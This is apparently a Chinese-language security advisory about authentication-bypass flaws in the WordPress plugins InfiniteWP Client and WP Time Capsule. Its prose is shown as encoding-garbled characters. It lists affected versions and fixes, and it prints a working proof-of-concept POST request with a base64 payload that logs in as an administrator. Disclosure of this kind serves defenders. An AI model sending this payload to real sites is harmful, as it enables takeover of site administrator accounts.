WordPress²å¼þInfiniteWP ClientºÍWP Time Capsule·ì϶·çÏÕ¹«¸æ
°ä²¼¹¦·ò 2020-01-16·ì϶±àºÅºÍ¼¶±ð
CVE±àºÅ£ºÔÝÎÞ£¬Î£ÏÕ¼¶±ð£ºÑϳÁ£¬CVSS·ÖÖµ£º³§ÉÌ×ÔÆÀ£º9.8£¬¹Ù·½Î´ÆÀ¶¨
Ó°Ïì°æ±¾
InfiniteWP Client < 1.9.4.5
WP Time Capsule < 1.21.16
·ì϶¸ÅÊö
WordPress²å¼þInfiniteWP ClientºÍWP Time CapsuleÖеÄÉí·ÝÑéÖ¤ÈÆ¹ý·ì϶ʹµÃ32Íò¸öÍøÕ¾Ò×Êܹ¥»÷¡£ÕâÁ½¸ö²å¼þÓÃÓÚÔ®ÊÖÓû§ÖÎÀíһ̨·þÎñÆ÷ÉϵĶà¸öWordPressÍøÕ¾£¬²¢ÔÚ°ä²¼¸üÐÂʱΪÎļþºÍÊý¾Ý¿âÌõ¿î´´½¨±¸·Ý¡£
WebArx°²È«×êÑÐÈËÔ±·¢ÏÖËüÃǵĴúÂëÖдæÔÚÂß¼ÃýÎó£¬Ê¹µÃ¹¥»÷ÕßÄܹ»ÈƹýÃÜÂëÀ´µÇ¼ÖÎÀíÔ¹ØË»§¡£Æ¾¾ÝWordPress²å¼þ¿â£¬InfiniteWP Client±»×°ÖÃÔÚ30¶àÍò¸öÍøÕ¾ÉÏ£»¶øWP Time CapsuleµÄ×°ÖÃÁ¿ÖÁÉÙΪ2Íò¡£
×êÑÐÈËÔ±·¢´Ë¿ÌµÍÓÚ°æ±¾1.9.4.5µÄInfiniteWP ClientÖУ¬¹¥»÷ÕßÄܹ»Ê¹ÓôøÓÐJSONºÍBase64±àÂëµÄpayloadµÄPOSTÒªÇóÀ´ÈƹýÃÜÂ룬ͨ¹ý½ö֪·ÖÎÀíÔ±Óû§ÃûÀ´µÇ¼¡£¶øÔÚµÍÓÚ1.21.16µÄWP Time Capsule°æ±¾ÖУ¬¹¥»÷Õß¿Éͨ¹ýÔÚÔʼPOSTÒªÇóÖÐÔö³¤¶ñÒâ×Ö·û´®À´Å²Óú¯Êý²¶»ñ¿ÉÓõÄÖÎÀíÔ¹ØË»§ÁÐ±í²¢ÒÔµÚÒ»¸öÖÎÀíÔ±Éí·ÝµÇ¼¡£
·ì϶ÑéÖ¤
²å¼þInfiniteWP ClientµÄPOC£ºhttps://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/¡£
Ê×ÏȱØÒªÊ¹ÓÃJSON±àÂëµÄ¸ºÔØ£¬¶øºóÊÇBase64¡£½ÓÏÂÀ´£¬Ëü½«ÔÚPOSTÒªÇóÖÐÔʼ·¢Ë͵½Ö¸±êÕ¾µã¡£
POST / HTTP/1.1
Host: example.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/plain
Content-Length: 93
_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
½¨¸´½¨Òé
ĿǰÕâÁ½¸ö²å¼þ¶¼ÒѰ䲼¸üн¨¸´Á˸ÃÎÊÌ⣺
https://wordpress.org/plugins/iwp-client/
https://wordpress.org/plugins/wp-time-capsule/
²Î¿¼Á´½Ó
https://threatpost.com/wordpress-bug-leaves-sites-open-to-attack/151911/


¾©¹«Íø°²±¸11010802024551ºÅ